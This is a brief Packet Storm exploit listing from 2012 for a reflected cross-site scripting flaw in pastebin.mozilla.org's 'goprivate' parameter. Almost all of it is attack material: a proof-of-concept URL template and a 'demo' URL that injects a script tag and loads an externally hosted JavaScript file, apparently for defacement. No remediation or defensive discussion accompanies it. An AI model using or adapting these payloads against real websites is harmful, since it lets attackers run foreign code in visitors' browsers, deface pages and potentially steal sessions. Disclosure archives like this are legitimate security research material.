Lucene search

K
packetstormAtmon3rPACKETSTORM:111794
HistoryApr 12, 2012 - 12:00 a.m.

Pastebin.mozilla.org Cross Site Scripting

2012-04-1200:00:00
Atmon3r
packetstormsecurity.com
18
`+-------------------------------------------------------------------------+  
# Exploit Title : Pastebin.mozilla.org - website XSS (Cross Site   
Scripting) and deface passive  
# Author : Atmon3r (atmoner.com)  
# Date : 12/04/2012  
# Editor : Jeroen (pastebin.com)  
# Xss type : $_GET  
+-------------------------------------------------------------------------+  
  
[+] POC:  
http://pastebin.mozilla.org/?help=1&goprivate={XSS}&go=Go  
  
[+] DEMO:  
http://pastebin.mozilla.org/?help=1&goprivate=/"><script>alert('Xss By   
Atm0n3r')</script><script type="text/javascript"   
src="http://yourjavascript.com/27544112151/xss.atmon3r.js"></script>&go=Go  
  
  
`